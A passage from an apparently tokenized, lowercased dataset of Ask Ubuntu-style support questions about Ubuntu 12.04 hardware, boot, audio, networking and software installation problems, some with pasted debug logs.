pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hb/hr ( ich8/r ) lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801h ( ich8 family ) 4 port sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801h ( ich8 family ) 2 port sata ide controller ( rev 02 ) 03:00.0 ethernet controller : broadcom corporation netxtreme bcm5754 gigabit ethernet pci express ( rev 02 ) edit2 : i do n't know , maybe i am not running tg3 correctly ? when i run modprobe tg3 , it does not run forever . it just finishes with no output . like this : # modprobe tg3 # _ dhclient loops forever though . is that ok ? edit : i booted the ubuntu 12.04 livecd and it still can not connect to the internet . i did modprobe tg3 and it did n't seem to do anything . what should i do ? edit : i got a new nic and now it works : )
175927	why is n't gnome 3 working on 12.04 in vmware player ?	after i installed gnome 3 , restarted , and logged back in with `` gnome '' as the chosen interface . my desktop looks like this . any solution ?
175933	why did my bluetooth headset disappear from sound settings and how can i get it back ?	kind of similar to this , i paired my bluetooth headset ( turtle beach ear force px5 ) in ubuntu and it at first showed up in `` sound settings '' after pairing . it was not initially working , so i started tweaking some settings . i tweaked a setting on the microphone , and all of a sudden both the output/input device disappeared . the device works with windows , although to get it to work with my phone simultaneously ( the headset is 2ch ) i usually disable the microphone and only enable it when needed . i captured the debug output from bluetoothd : bluetoothd [ 31789 ] : audio/headset.c : headset_connect_cb ( ) /org/bluez/31789/hci0/dev_00_13_8a_4e_64_03 : connected to 00:13:8a:4e:64:03 bluetoothd [ 31789 ] : audio/headset.c : handle_event ( ) received at+brsf=9 bluetoothd [ 31789 ] : audio/headset.c : print_hf_features ( ) hfp hf features : `` ec and/or nr function '' `` voice recognition activation '' bluetoothd [ 31789 ] : audio/headset.c : handle_event ( ) received at+cind= ? bluetoothd [ 31789 ] : audio/headset.c : handle_event ( ) received at+cind ? bluetoothd [ 31789 ] : audio/headset.c : handle_event ( ) received at+cmer=3 , 0 , 0 , 1 bluetoothd [ 31789 ] : audio/headset.c : event_reporting ( ) event reporting ( cmer ) : mode=3 , ind=1 bluetoothd [ 31789 ] : audio/headset.c : hfp_slc_complete ( ) hfp service level connection established bluetoothd [ 31789 ] : audio/telephony.c : telephony_device_connected ( ) telephony-dummy : device 0x7fa1944b6f10 connected bluetoothd [ 31789 ] : audio/headset.c : headset_set_state ( ) state changed /org/bluez/31789/hci0/dev_00_13_8a_4e_64_03 : headset_state_connecting - > headset_state_connected bluetoothd [ 31789 ] : audio/media.c : headset_state_changed ( ) bluetoothd [ 31789 ] : audio/avdtp.c : avdtp_ref ( ) 0x7fa1944b9e00 : ref=2 bluetoothd [ 31789 ] : audio/avdtp.c : avdtp_ref ( ) 0x7fa1944b9e00 : ref=3 bluetoothd [ 31789 ] : audio/sink.c : sink_set_state ( ) state changed /org/bluez/31789/hci0/dev_00_13_8a_4e_64_03 : sink_state_disconnected - > sink_state_connecting bluetoothd [ 31789 ] : audio/avdtp.c : avdtp_unref ( ) 0x7fa1944b9e00 : ref=2 bluetoothd [ 31789 ] : connection refused ( 111 ) bluetoothd [ 31789 ] : audio/avdtp.c : connection_lost ( ) disconnected from 00:13:8a:4e:64:03 bluetoothd [ 31789 ] : audio/avdtp.c : avdtp_unref ( ) 0x7fa1944b9e00 : ref=1 bluetoothd [ 31789 ] : audio/sink.c : sink_set_state ( ) state changed /org/bluez/31789/hci0/dev_00_13_8a_4e_64_03 : sink_state_connecting - > sink_state_disconnected bluetoothd [ 31789 ] : audio/sink.c : discovery_complete ( ) connect : connect xcase detected bluetoothd [ 31789 ] : audio/sink.c : sink_set_state ( ) state changed /org/bluez/31789/hci0/dev_00_13_8a_4e_64_03 : sink_state_disconnected - > sink_state_disconnected bluetoothd [ 31789 ] : audio/avdtp.c : avdtp_unref ( ) 0x7fa1944b9e00 : ref=0 bluetoothd [ 31789 ] : audio/avdtp.c : avdtp_unref ( ) 0x7fa1944b9e00 : freeing session and removing from list bluetoothd [ 31789 ] : audio/unix.c : server_cb ( ) accepted new client connection on unix socket ( fd=30 ) bluetoothd [ 31789 ] : audio/sink.c : stream_setup_retry ( ) stream setup failed , after xcase connect : connect i 've tried deleting and repairing the device , but it looks like i 've set some persistent device setting accidentally in the depths and the device is n't showing up in sound settings anymore to allow me to change it . does anyone have any pointers ? i 'm running ubuntu 12.04 .
175938	how to run `` gsettings '' command inside a kickstart file ?	i want to create an unattended installation cd of ubuntu 12.04 with several customizations . i 've written a kickstart file to do so , and it works perfectly . ( i know that preseed technology exists , but incomprehensibly it fails whenever kickstart works like a charm ) . however , when i want to execute ( in % post section ) the `` gsettings '' command to customize my desktop , anything happens . i 've read in forums that `` gsettings '' only works when there 's a gnome session initiated ( unity is only one incarnation ) , but this it 's a mess : i only want to have a kickstart file to configure parameters of gnome in a very fast way . is there a manner of achieve this ? thanks ! !
175939	copying ( usb drive to usb drive ) suddenly slowed down . ubuntu server 12.04	i just got an old computer from a friend and i am using it as a mediatomb server . because the computers hard drives are rather small and i do n't have the money for newer ones i am temporarily using 2 usb drives to store all the media . i am currently in the progress of transferring all my media files from my three other computers to these 2 drives using a third . until yesterday this all went smoothly , but since this afternoon , when i started a new 'batch ' of copying my copying speed suddenly dropped to app . 0.4mb/s ( according to nautilus ) to clarify : i did n't touch the computer between finishing the last copying task , disconnecting the drive , copying files from another computer onto it , reconnecting it and starting to copy again . also , rebooting and disabling mediatomb have had no effect .
175942	i wrote a python/qt app that downloads files . how can i stop it from 'greying out ' after few seconds ?	here 's the gist . the application is still running and the progress bar will still move , but the window will grey out and if i click the x to close it , a popup shows up and says `` the window x is not responding , force quit ? '' if i force quit it , the window closes , but i can see the application is still running when i run it from the terminal . i 'm using qt 4 .
175943	assign super key to shortcut	i am using gnome classic ( no effects ) on ubuntu 11.10 . i installed gnome-do today , and i wanted to assign it to the super key . however i can only assign it to a combination of keys ( super + some other key ) . does anyone know a way to work around this ? thanks in advance .
175945	how to recover data from the lost+found folder ?	i 've lost some important stuff after a system crash and recovery . the lost+found directory is on the right volume for it to be it possibly but i 'm unable to view , let alone recover ! i 've tried recovering the partition with gparted and now i 'm lost . what can i do ?
175949	virtual/dual-boot windows and ubuntu	i have ubuntu on one harddisk and windows 7 home premium on another . i made absolutely certain they 're completely separate , so i have to actively choose to boot from windows ' disk if i want to run it . this is working well . but now i would like to run ubuntu as a vm with virtualbox while running windows . that is to say , i 'll create a vm with direct access to ubuntus disk . i 've done this once before , but then i did the reverse ; running windows as a vm and as a host . that ended up very badly . ubuntu , however , should n't have any problems being run like this , should it ? i mean , there 's no chance the disk will be used by both operating systems at the same time in any case . but what about drivers and such ? it 's probably amds display driver i 'm most worried about . is there anything i need to worry about here ?
175951	how should i install ubuntu in my case ?	i tried so hard to download ubuntu 12.04 inside windows but it did n't work . also i tried to download it on cd and flash but it did n't work . can i download ubuntu 10.10 or 11.10 or another old version from the ubuntu home page ? how can i install it alone ( not inside windows ) without using cd or flash ?
175952	what does 1 > & 5 mean ?	sometimes , in shell scripts , i see like echo yes 1 > & 5 i understand it redirect to somewhere , but i would like to know more detail . and more specifically , what do 1 , > , & , 5 mean ? i would be appreciated if you explain them token by token . or any pointer that explains .
175955	windows 7 does n't recognize the hard drive ubuntu is on	i have two hard drives , one that my windows 7 install is on and another that i have my data is on . i had set aside 100 gb on the data drive to install ubuntu , which has worked fine in the past when i used grub . i broke it by messing around , so i wiped it clean and decided to reinstall . this time , though , i wanted to use window 's bootloader so if i break ubuntu again i do n't have to fix the mbr again . i was following this guide , which is admittedly for dual booting off the same hard drive but i figured i could get it to work . i partitioned off 100 gb of my data drive and no problem , windows still recognizes the drive just fine . then i installed ubuntu ( manually creating the partitions ) on my data drive . seems to work fine , until reboot . for some reason , windows can no longer see the data drive at all . what 's really weird is that when i was using grub as my bootloader it could see the drive just fine . why ca n't windows see the hard drive ? is there a way i can make this work ? or am i just going to have to use grub as my bootloader ?
175957	unity launcher no longer autohides after upgrade	after upgrading , unity launcher is now always `` active '' whereas it used to auto-hide . how can i change this panels properties so that it auto-hides again ?
175964	light os alternative to ubuntu	i have asked a question has the ubuntu heating problem for sony vaio users been solved ? which did n't seem to get any answers , but i desperately want to use a *nix based operating system ( to enhance my programming skills ) . what *nix type os should i use that is light , works for most important tasks of a programmer and at least has a browser , which does n't cause ( or should n't cause ) heating problems for sony-vaio ?
175967	my lenovo w500 resumes from suspend prematurely	in both ubuntu 10.04 and 12.04 , a perfectly happy sleeping laptop is woken when moved . either the hd-shock detection , the trackpad or a sloppy key will wake it when the lid is closed . to test this i suspended the computer and left it for 5-10 minutes where it slept nicely with the lid open . then pressing the fn-key would wake it in 12.04 . in sleep mode with the lid closed , moving the laptop wakes it . sometimes it immediately goes back to sleep , but not always . it 's a laptop and i put it in a bag to carry to and from work , so being asleep is kind of important . i 'm hoping someone can suggest a way to debug . thanks ! mike
175974	problems mounting the ntfs partition .	i 'm a linux noob so you 're going to have to talk noobish to me to understand ... i just installed the newest version of ubuntu on my computer and i am having some problems mounting my ntfs drive . on boot it asks me to skip the mounting process or do it manually . i 'm not sure what to do . when i do try to mount , i get this error : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sda2 on /media/286452716452422c â i got the ntfs mounting tool and it does n't seem to work right ... any ideas would be most helpful .
175977	default startup scripts	i just installed unclutter on ubuntu 12.04 , gnome 3 , but it uses standard settings , and there is no way i can change them from terminal , not to mention i need to apply them from the very start . i think the only way is to find unclutter in the default script that runs it . but i dont know where it is and where to find it . it is not in the startup applications , i checked .
175983	unity displaces windows when switching workspaces	this has happened to me on both the 12.04 installs i have tried . sometimes , maybe 3 times a day , when i switch workspaces to go to programs i leave open in other workspaces , the window is n't there . i find them in odd positions - for example , i just found my browser window half off the bottom of workspace 4 , wrapped around to partly in the top of workspace 1 . what makes it more likely to happen appears to be when a window has a child window/dialog open . the child is very likely to be displaced randomly ? edit : have switched off all extra workspaces - now just working in one , because i got tired of hunting down lost app windows . either no-one else is seeing this , or else no-one has any solution .
175984	error log for papercut crash	it looks like papercut is causing some problems after an upgrade : where is this log located ?
175987	help compiling banshee-telepathy-extension	i 've made some changes to the banshee-telepathy-extension , but i ca n't get it to compile on ubuntu 12.04 , even after issuing a banshee checking for banshee_1_thickclient ... no configure : error : package requirements ( banshee-1-thickclient > = 1.5.3 ) were not met : ` thanks in advance . : ) ps - full stack below : rafael @ noir : ~/workspace/banshee-telepathy-extension $ ./autogen.sh i am going to run ./configure with no arguments - if you wish to pass any to it , please specify them on the ./autogen.sh command line . running aclocal -i . ... running automake -- gnu ... makefile.include:66 : `pkglibdir ' is not a legitimate directory for `scripts' src/makefile.am:181 : `makefile.include ' included from here running autoconf ... running ./configure ... checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... yes checking for pkg-config ... /usr/bin/pkg-config checking for gmcs ... /usr/bin/gmcs checking pkg-config is at least version 0.9.0 ... yes checking for mono ... yes checking for gtk_sharp_20 ... yes checking for banshee_1_thickclient ... no configure : error : package requirements ( banshee-1-thickclient > = 1.5.3 ) were not met : no package 'banshee-1-thickclient ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables banshee_1_thickclient_cflags and banshee_1_thickclient_libs to avoid the need to call pkg-config . see the pkg-config man page for more details .
175990	is there any way to make the filesystem larger when running from live cd ?	i am packaging an application for ubuntu and the only reasonable repeatable test bed i 've come up with is a machine running a live cd . i ca n't use a vm as the application requires 3d acceleration ( virtualbox 's current solution does n't cut it ) . unfortunately , the package is about 2gb , so it is unable to be installed , since the file system is around 4gb total . just wondering if there 's a way to increase the size of the file system in a way that would benefit what i 'm trying to do ? any further information about how ubuntu live cd works out how large to create the fs ?
175993	backup : ubuntu 12.04 precise	i have installed ubuntu 12.04 again 5 times now . how to take backup . yesterday , i installed some driver that crashed my system and i was unable to boot into my ubuntu . then after i installed second time , my mobile broad band connection was not working . also i do n't have any good internet connection . then how can i take a backup . my ubuntu is working fine now . but it may break again . i need backup . but how will i restore backup if i am unable to log into ubuntu . note : i do n't want a script to install all these packages from their repositories again . as i do n't want to use internet .
176001	what does virt , res and shr means in the top command ?	i was going through the top command . there are some terms on which i am confused and needs some clarification . please find is the attached screen shot : - i need some info regarding the wa , hi , si and st terms one can find in the cpu ( s ) row and virt , res and shr . many thanks for your help .
176008	how do i backup ( clone ) a full hd to a specific partition on a bigger hd ?	i have installed ubuntu 12.04lts and i am trying to recover files off a failing hd that is 400gb . the drive i am trying to copy to is 500 gb but i have ubuntu installed on the same drive . see the image to understand my partition setup ( yes it just might be ridiculous but i 'm a noob ) anyway.. i want to be able to copy my 400 gb hd ( contains a vista installation ) to this 500 gb hd in the sda8 partition . does that make sense ? also i want to be able to eventually access these files via another vista installation . i just want to get them off the other hard drive which is basically failed ( so this might all be moot ) . when i created the sda8 partition i did n't choose a format : does this matter ? it would be really nice if the 500gb still had a usable ubuntu on if after the transfer and that i would eventually be able to see the recovered files in a future vista install . can you guys help ?
176009	how can i synchronise play counts between banshee and rhythmbox	i want the play counts for songs in my rhythmbox library to be the same as the play counts in my banshee library ( and vice versa ) . how can i do this ?
176010	exclude some of the `` find '' results	i 'm using find command along with -exec something argument . can i exclude some directories/name that match regex ( something like rsync 's -- exclude ) ? will -prune be enough if i want to exclude many things ?
176011	could n't boot windows7 after installing 12.04 on a dell n 5050 laptop	i installed 12.04 ( 64bit ) alongside windows 7 ( 64bit ) through a usb drive . earlier i could n't load ubuntu without a usb drive until i ran sudo grub-install -- force /dev/sda2 . but now i ca n't load windows 7 ( loader ) ( on/dev/sda2 ) in grub . when i select that , it displays a black screen and then returns to grub . help me to solve this . i read `` installing grub 2 '' article but i can not understand what i should do .
176012	ubuntu alias not applied in bashrc	i am under ubuntu 12.04 lts . i have added such line to ~/.bashrc alias myconf= '' sudo nano /opt/nginx/conf/sites-available/efiling '' i tried with single quotes too : alias myconf='sudo nano /opt/nginx/conf/sites-available/efiling' then i logged out and logged in again . test @ stork : ~ $ myconf myconf : command not found but after test @ stork : ~ $ source ~/.bashrc it works . can anyone help me ?
176015	unable to use `` graphics.h '' header file in 12.04	i am new to ubuntu and i need to write some graphics programs in c which uses the header file graphics.h , but i am not being able to run any of my code without that header file , which is not present in any package by default . i ca n't understand what to do to fix this problem . i tried a lot of things suggested by some sites like this but to no avail . there were errors in the process . i need to finish my project . please help as soon as possible .
176016	localhost problem	i just installed lamp recently to study wordpress . i install lamp using tasksel . but the problem is everytime i access the localhost alone , it shows this : it says localhost/mythweb . well in the tutorial i assume that it would be like this.. please help . thanks
176019	`` continue '' button not showing while installing ubuntu	i 've reached the installation screen on my netbook and have ticked all the screens ( download updates etc ) . the requisite memory is ticked and the internet access is ticked but i ca n't find a `` install '' or `` go '' button to continue . how do i access the lower part of the small screen ?
176025	how to install bitcoin mining software ?	i see there 's an existing question on how to install the satoshi bitcoin client , but i 'm wanting to install mining software . like the asker of the above question , i 'm new to ubuntu , so i 'm not familiar with the process of installing software if it 's not in the package manager . i 've got a ati 5770 card which i 've previously used with the pheonix miner , so that will likely be the best mining software to use . it 's available here , but i 'm not sure what to do with it now that i 've downloaded it .
176030	start lampp at startup as root	i have lampp installed on my ubuntu 12.04 everything works very fine and now i would like to start the lampp-server on startup . i have a startlampp.sh script with this : cd /opt/lampp sudo ./lampp start code in it . it is enabled for execution and when i run it in terminal i am asked for the password and finally it starts lampp . can i include the password in the script that it runs on startup ? greetings philipp
176036	sound through headphones is crackling/popping	the sound through my speakers is fine , however it cracks/popples when played through my headphones . while looking for a solution , i found this . i tested this by unplugging my headphones , plugging them in again , and then quickly playing sound through them . the sound sounds file for ten seconds , then it starts crackling and popping again . however , there is no options snd-hda-intel power_save=10 power_save_controller=n in my alsa-base.conf file . is there an alternate parameter that i can change ?
176038	how can i play a song in the background via my command line ?	i have installed play : sudo apt-get install sox libsox-fmt-mp3 i can now play my audio files like this : play desktop/songs/01\ -\ oh\ baby\ girl.mp3 since i 'm learning shell , i wish i could do something like this : ( sleep 10 ; play desktop/songs/01\ -\ oh\ baby\ girl.mp3 ) & after 10 sec 's , i can see the screen as : file size : 7.38m bit rate : 260k encoding : mpeg audio info : 2012 channels : 2 @ 16-bit track : 01/09 samplerate : 44100hz album : maalai pozhudhin mayakathilaey : : : tunesinn.blogspot.com : : : replaygain : off artist : hemachandra , achu duration : 00:03:46.98 title : oh baby girl but the song is not playing . but if i do this ( without & ) : ( sleep 10 ; play desktop/songs/01\ -\ oh\ baby\ girl.mp3 ) is working as expected . but i could n't able to use my terminal in meanwhile . how could i resolve my problem , with using & ?
176039	installing wine on 12.04	well , i wonder if i am doing the right thing . i need to install wine on 12.04 as its not install by default , and i had use the command : sudo add-apt-repository ppa : ubuntu-wine/ppa and sudo apt-get update & & sudo apt-get install wine1.5 was it right ?
176048	ubuntu 12.04 www.grc.com ports , all closed , but one port 646 ldp hidden color green ?	i did scan of my computer ports using deafult ubuntu 12.04 installation , at www.grc.com , all of them are in color gray closed , except for one : port 646 ldp ( port authority database ) its hidden state and in color green . should i 'll be worried , in terms of security ? update ok , i did sudo nmap -ss -sv -vv -p646 ( with my public ip ) . got same results as you . 646/tcp closed ldp you wrote : ( but you may want to look into why your router is running an ldp server . you may be able to disable ldp in you router 's settings ) i use : -wired ethernet connection -i dont use a router -i dont use a hardware firewall -i got cable -i use only motorola surfboard cable mothem , model sb5100i so propably my isp ( internet service provider ) configuration , provided to their customers , is the one that has something to do with the router ldp server port 646 tcp stealth filtered green status .
176051	computer boots directly to windows after installing ubuntu	i bought vaio e14a16 . i installed ubuntu 12.04 along-side windows 7 ( dual boot ) from cd. , when i reboot , it starts windows 7 directly . if i press f11 it says no operating system found where did i go wrong ? is it vaio which is affecting ? what can i do to fix this problem ? edit as i said i installed 64 bit version via pen drive ( outside windows ) with booting from pendrive and than intalling it . i have no idea what grub is , and there are so many partitions vaio made . i tried to change boot from uefi to lagacy , but it was saying some boot loader problem . i do n't wan na remove windows 7. so before things get wrong i switched back to uefi . what exactly i need to do to make ubuntu run ?
176052	ubuntu 12.04 ( lubuntu ) , manage networks , panel icon , incoming traffic . why ?	manage networks , panel icon , it shows constant incoming traffic , not outgoing , just incoming packets , but i am not surfing internet , or doing any updates , i am basically not using internet , so why i got incoming traffic ? whether is a bad guys intrusion or not , looks like ubuntu 12.04 ( lubuntu ) its blocking it , somehow , but i am not shure . i thought that there should be no traffic at all , in outgoing and incoming connections , if i am not using internet at all . how do i stop this traffic ? it something i should be worried about , in terms od security ?
176054	why is n't my android emulator booting ?	root @ saun-vostro-3500 : /home/saun/downloads/android-sdk-linux/platform-tools # emulator-arm -avd sampy -partition-size 128 -no-snapshot-load -verbose -cpu-delay 0 -no-boot-anim -debug all -show-kernel emulator : found sdk root at /home/saun/downloads/android-sdk-linux emulator : android virtual device file at : /root/.android/avd/sampy.ini emulator : /root/.android/avd/sampy.ini : parsing as .ini file emulator : 1 : key='target ' value='android-8' emulator : 2 : key='path ' value='/root/.android/avd/sampy.avd' emulator : /root/.android/avd/sampy.ini : parsing finished emulator : virtual device content at /root/.android/avd/sampy.avd emulator : virtual device config file : /root/.android/avd/sampy.avd/config.ini emulator : /root/.android/avd/sampy.avd/config.ini : parsing as .ini file emulator : 1 : key='hw.lcd.density ' value='240' emulator : 2 : key='sdcard.size ' value='128m' emulator : 3 : key='skin.name ' value='wvga800' emulator : 4 : key='skin.path ' value='platforms/android-8/skins/wvga800' emulator : 5 : key='hw.cpu.arch ' value='arm' emulator : 6 : key='abi.type ' value='armeabi' emulator : 7 : key='vm.heapsize ' value='24' emulator : 8 : key='image.sysdir.1 ' value='platforms/android-8/images/' emulator : /root/.android/avd/sampy.avd/config.ini : parsing finished emulator : using core hw config path : /root/.android/avd/sampy.avd/hardware-qemu.ini emulator : found target field in root avd .ini file : 'android-8' emulator : found avd target api level : 8 emulator : found image search path : platforms/android-8/images/ emulator : found a total of 1 search paths for this avd emulator : found skin 'wvga800 ' in directory : /home/saun/downloads/android-sdk-linux/platforms/android-8/skins emulator : autoconfig : -skin wvga800 emulator : autoconfig : -skindir /home/saun/downloads/android-sdk-linux/platforms/android-8/skins emulator : found skin-specific hardware.ini : /home/saun/downloads/android-sdk-linux/platforms/android-8/skins/wvga800/hardware.ini emulator : /home/saun/downloads/android-sdk-linux/platforms/android-8/skins/wvga800/hardware.ini : parsing as .ini file emulator : 2 : key='hw.lcd.density ' value='240' emulator : 3 : key='vm.heapsize ' value='24' emulator : /home/saun/downloads/android-sdk-linux/platforms/android-8/skins/wvga800/hardware.ini : parsing finished emulator : adding binding button_call to f3 emulator : adding binding button_hangup to f4 emulator : adding binding button_home to home emulator : adding binding button_back to escape emulator : adding binding button_menu to f2 emulator : adding binding button_menu to pageup emulator : adding binding button_star to shift-f2 emulator : adding binding button_star to pagedown emulator : adding binding button_power to f7 emulator : adding binding button_search to f5 emulator : adding binding button_camera to ctrl-keypad_5 emulator : adding binding button_camera to ctrl-f3 emulator : adding binding button_volume_up to keypad_plus emulator : adding binding button_volume_up to ctrl-f5 emulator : adding binding button_volume_down to keypad_minus emulator : adding binding button_volume_down to ctrl-f6 emulator : adding binding toggle_network to f8 emulator : adding binding toggle_tracing to f9 emulator : adding binding toggle_fullscreen to alt-enter emulator : adding binding button_dpad_center to keypad_5 emulator : adding binding button_dpad_up to keypad_8 emulator : adding binding button_dpad_left to keypad_4 emulator : adding binding button_dpad_right to keypad_6 emulator : adding binding button_dpad_down to keypad_2 emulator : adding binding toggle_trackball to f6 emulator : adding binding show_trackball to delete emulator : adding binding change_layout_prev to keypad_7 emulator : adding binding change_layout_prev to ctrl-f11 emulator : adding binding change_layout_next to keypad_9 emulator : adding binding change_layout_next to ctrl-f12 emulator : adding binding onion_alpha_up to keypad_multiply emulator : adding binding onion_alpha_down to keypad_divide emulator : keyset loaded from : /root/.android/default.keyset emulator : /root/.android/avd/sampy.avd/emulator-user.ini : parsing as .ini file emulator : 1 : key='window.x ' value='67' emulator : 2 : key='window.y ' value='52' emulator : 3 : key='uuid ' value='1344924399997' emulator : /root/.android/avd/sampy.avd/emulator-user.ini : parsing finished emulator : trying to load skin file '/home/saun/downloads/android-sdk-linux/platforms/android-8/skins/wvga800/layout' emulator : skin network speed : 'full' emulator : skin network delay : 'none' emulator : found kernel-qemu in search dir : /home/saun/downloads/android-sdk-linux/platforms/android-8/images/ emulator : autoconfig : -kernel /home/saun/downloads/android-sdk-linux/platforms/android-8/images//kernel-qemu emulator : found ramdisk.img in search dir : /home/saun/downloads/android-sdk-linux/platforms/android-8/images/ emulator : autoconfig : -ramdisk /home/saun/downloads/android-sdk-linux/platforms/android-8/images//ramdisk.img emulator : found system.img in search dir : /home/saun/downloads/android-sdk-linux/platforms/android-8/images/ emulator : using initial system image : /home/saun/downloads/android-sdk-linux/platforms/android-8/images//system.img emulator : autoconfig : -data /root/.android/avd/sampy.avd/userdata-qemu.img emulator : autoconfig : -initdata /root/.android/avd/sampy.avd/userdata.img emulator : autoconfig : -cache /root/.android/avd/sampy.avd/cache.img emulator : autoconfig : -sdcard /root/.android/avd/sampy.avd/sdcard.img emulator : physical ram size : 128mb emulator : no qwerty2.kcm in search dir : /home/saun/downloads/android-sdk-linux/platforms/android-8/images/ emulator : < memoryfile > : parsing as .ini file emulator : < memoryfile > : parsing finished content of hardware configuration file : hw.cpu.arch = arm hw.ramsize = 128 hw.screen = touch hw.mainkeys = yes hw.trackball = yes hw.keyboard = no hw.keyboard.lid = yes hw.keyboard.charmap = qwerty2 hw.dpad = yes hw.gsmmodem = yes hw.gps = yes hw.battery = yes hw.accelerometer = yes hw.audioinput = yes hw.audiooutput = yes hw.sdcard = yes hw.sdcard.path = /root/.android/avd/sampy.avd/sdcard.img disk.cachepartition = yes disk.cachepartition.path = /root/.android/avd/sampy.avd/cache.img disk.cachepartition.size = 66m hw.lcd.width = 480 hw.lcd.height = 800 hw.lcd.depth = 16 hw.lcd.density = 240 hw.lcd.backlight = yes hw.gpu.enabled = no hw.camera.back = emulated hw.camera.front = none vm.heapsize = 24 hw.sensors.proximity = yes hw.sensors.magnetic_field = yes hw.sensors.orientation = yes hw.sensors.temperature = yes kernel.path = /home/saun/downloads/android-sdk-linux/platforms/android-8/images//kernel-qemu kernel.parameters = android.checkjni=1 android.bootanim=0 disk.ramdisk.path = /home/saun/downloads/android-sdk-linux/platforms/android-8/images//ramdisk.img disk.systempartition.initpath = /home/saun/downloads/android-sdk-linux/platforms/android-8/images//system.img disk.systempartition.size = 128m disk.datapartition.path = /root/.android/avd/sampy.avd/userdata-qemu.img disk.datapartition.size = 128m avd.name = sampy . qemu options list : emulator : argv [ 00 ] = `` emulator-arm '' emulator : argv [ 01 ] = `` -cpu-delay '' emulator : argv [ 02 ] = `` 0 '' emulator : argv [ 03 ] = `` -show-kernel '' emulator : argv [ 04 ] = `` -android-hw '' emulator : argv [ 05 ] = `` /root/.android/avd/sampy.avd/hardware-qemu.ini '' concatenated qemu options : emulator-arm -cpu-delay 0 -show-kernel -android-hw /root/.android/avd/sampy.avd/hardware-qemu.ini emulator : android_qemud_init emulator : registered qemud service boot-properties emulator : registered 'boot-properties ' qemud service emulator : android_qemud_init emulator : registered qemud service hw-control emulator : android_hw_control_init : hw-control qemud handler initialized emulator : /root/.android/avd/sampy.avd/hardware-qemu.ini : parsing as .ini file emulator : 1 : key='hw.cpu.arch ' value='arm' emulator : 2 : key='hw.ramsize ' value='128' emulator : 3 : key='hw.screen ' value='touch' emulator : 4 : key='hw.mainkeys ' value='yes' emulator : 5 : key='hw.trackball ' value='yes' emulator : 6 : key='hw.keyboard ' value='no' emulator : 7 : key='hw.keyboard.lid ' value='yes' emulator : 8 : key='hw.keyboard.charmap ' value='qwerty2' emulator : 9 : key='hw.dpad ' value='yes' emulator : 10 : key='hw.gsmmodem ' value='yes' emulator : 11 : key='hw.gps ' value='yes' emulator : 12 : key='hw.battery ' value='yes' emulator : 13 : key='hw.accelerometer ' value='yes' emulator : 14 : key='hw.audioinput ' value='yes' emulator : 15 : key='hw.audiooutput ' value='yes' emulator : 16 : key='hw.sdcard ' value='yes' emulator : 17 : key='hw.sdcard.path ' value='/root/.android/avd/sampy.avd/sdcard.img' emulator : 18 : key='disk.cachepartition ' value='yes' emulator : 19 : key='disk.cachepartition.path ' value='/root/.android/avd/sampy.avd/cache.img' emulator : 20 : key='disk.cachepartition.size ' value='66m' emulator : 21 : key='hw.lcd.width ' value='480' emulator : 22 : key='hw.lcd.height ' value='800' emulator : 23 : key='hw.lcd.depth ' value='16' emulator : 24 : key='hw.lcd.density ' value='240' emulator : 25 : key='hw.lcd.backlight ' value='yes' emulator : 26 : key='hw.gpu.enabled ' value='no' emulator : 27 : key='hw.camera.back ' value='emulated' emulator : 28 : key='hw.camera.front ' value='none' emulator : 29 : key='vm.heapsize ' value='24' emulator : 30 : key='hw.sensors.proximity ' value='yes' emulator : 31 : key='hw.sensors.magnetic_field ' value='yes' emulator : 32 : key='hw.sensors.orientation ' value='yes' emulator : 33 : key='hw.sensors.temperature ' value='yes' emulator : 34 : key='kernel.path ' value='/home/saun/downloads/android-sdk-linux/platforms/android-8/images//kernel-qemu' emulator : 35 : key='kernel.parameters ' value='android.checkjni=1 android.bootanim=0' emulator : 36 : key='disk.ramdisk.path ' value='/home/saun/downloads/android-sdk-linux/platforms/android-8/images//ramdisk.img' emulator : 37 : key='disk.systempartition.initpath ' value='/home/saun/downloads/android-sdk-linux/platforms/android-8/images//system.img' emulator : 38 : key='disk.systempartition.size ' value='128m' emulator : 39 : key='disk.datapartition.path ' value='/root/.android/avd/sampy.avd/userdata-qemu.img' emulator : 40 : key='disk.datapartition.size ' value='128m' emulator : 41 : key='avd.name ' value='sampy' emulator : /root/.android/avd/sampy.avd/hardware-qemu.ini : parsing finished emulator : nand_add_dev : system , size=0x8000000 , initfile=/home/saun/downloads/android-sdk-linux/platforms/android-8/images//system.img emulator : mapping 'system ' nand image to /tmp/android-root/emulator-h7z8kl emulator : rounding devsize up to a full eraseunit , now 8001000 emulator : nand_add_dev : userdata , size=0x8000000 , file=/root/.android/avd/sampy.avd/userdata-qemu.img emulator : rounding devsize up to a full eraseunit , now 8001000 emulator : android_qemud_init emulator : registered qemud service boot-properties emulator : registered 'boot-properties ' qemud service emulator : adding boot property : 'dalvik.vm.heapsize ' = '24m' emulator : adding boot property : 'qemu.sf.lcd_density ' = '240' emulator : adding boot property : 'qemu.hw.mainkeys ' = '1' emulator : android_qemud_init emulator : registered qemud service gsm emulator : android_qemud_init emulator : registered qemud service gps emulator : adding boot property : 'qemu.sf.fake_camera ' = 'back' emulator : android_qemud_init emulator : registered qemud service camera emulator : android_camera_service_init : registered 'camera ' qemud service emulator : ip address of your dns ( s ) : 127.0.0.1 emulator : nand_add_dev : cache , size=0x4200000 , file=/root/.android/avd/sampy.avd/cache.img emulator : initializing hardware opengles emulation support emulator : kernel parameters : qemu.gles=0 qemu=1 console=ttys0 android.qemud=ttys1 android.checkjni=1 android.bootanim=0 ndns=1 emulator : qpa_audio_init : entering emulator : qpa_audio_init : exiting emulator : trace file name is not set emulator : autoconfig : -scale 0.85363 emulator : android_qemud_init emulator : registered qemud service sensors emulator : android_hw_sensors_init : sensors qemud service initialized emulator : emulator window was out of view and was recentered serial0 console emulator : could not open file : ( null ) /system/build.prop : no such file or directory emulator : control console listening on port 5554 , adb on port 5555 using config file : /root/.android/modem-nv-ram-5554 setting value of oper_name_index to 2 ( 2 ) setting value of selection_mode 